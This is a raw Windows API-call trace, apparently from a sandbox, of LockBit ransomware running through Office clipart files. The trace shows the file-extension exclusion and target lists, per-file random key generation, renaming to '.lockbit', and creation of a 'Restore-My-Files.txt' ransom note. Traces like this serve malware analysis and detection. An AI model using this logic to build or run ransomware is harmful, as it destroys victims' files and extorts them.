lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.028] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.120] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.120] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212601.WMF.lockbit") returned 72 [0152.120] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212601.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212601.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.121] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.121] malloc (_Size=0x40068) returned 0x3df0008 [0152.121] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9676) returned 1 [0152.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.122] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.122] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212601.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212601.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.125] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.125] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.128] free (_Block=0x1fa2ed8) [0152.128] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212601.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.128] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.128] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66057f70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x199a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212685.WMF", cAlternateFileName="")) returned 1 [0152.129] lstrcmpiW (lpString1=".", lpString2="J0212685.WMF") returned -1 [0152.129] lstrcmpiW (lpString1="..", lpString2="J0212685.WMF") returned -1 [0152.129] PathFindExtensionW (pszPath="J0212685.WMF") returned=".WMF" [0152.129] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.129] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.130] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.130] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212685.WMF") returned 1 [0152.130] lstrcmpiW (lpString1="ntldr", lpString2="J0212685.WMF") returned 1 [0152.130] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212685.WMF") returned 1 [0152.130] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212685.WMF") returned -1 [0152.131] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212685.WMF") returned -1 [0152.131] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212685.WMF") returned 1 [0152.131] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212685.WMF") returned -1 [0152.131] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.131] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212685.WMF") returned=".WMF" [0152.131] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.131] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.131] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.132] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.132] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.132] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.132] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.132] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212685.WMF.lockbit") returned 72 [0152.132] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212685.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212685.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0152.133] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.133] malloc (_Size=0x40068) returned 0x1ff1e60 [0152.133] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6554) returned 1 [0152.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0152.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0152.134] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.138] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212685.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212685.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.138] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.138] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.138] free (_Block=0x1fa2ed8) [0152.138] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212685.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.139] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.139] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x80c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212751.WMF", cAlternateFileName="")) returned 1 [0152.139] lstrcmpiW (lpString1=".", lpString2="J0212751.WMF") returned -1 [0152.139] lstrcmpiW (lpString1="..", lpString2="J0212751.WMF") returned -1 [0152.139] PathFindExtensionW (pszPath="J0212751.WMF") returned=".WMF" [0152.139] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.139] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.140] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.140] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212751.WMF") returned 1 [0152.141] lstrcmpiW (lpString1="ntldr", lpString2="J0212751.WMF") returned 1 [0152.141] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212751.WMF") returned 1 [0152.141] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212751.WMF") returned -1 [0152.141] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212751.WMF") returned -1 [0152.141] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212751.WMF") returned 1 [0152.141] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212751.WMF") returned -1 [0152.141] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.141] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212751.WMF") returned=".WMF" [0152.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.141] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.141] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.142] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.142] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212751.WMF.lockbit") returned 72 [0152.142] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212751.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212751.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0152.146] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.146] malloc (_Size=0x40068) returned 0x3d70450 [0152.146] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2060) returned 1 [0152.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0152.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0152.147] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.149] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212751.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212751.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.149] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.150] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.150] free (_Block=0x1fa2ed8) [0152.150] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212751.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.150] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.150] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.150] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212953.WMF", cAlternateFileName="")) returned 1 [0152.151] lstrcmpiW (lpString1=".", lpString2="J0212953.WMF") returned -1 [0152.151] lstrcmpiW (lpString1="..", lpString2="J0212953.WMF") returned -1 [0152.151] PathFindExtensionW (pszPath="J0212953.WMF") returned=".WMF" [0152.151] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.151] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.152] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".rom", lpString2=".WMF") 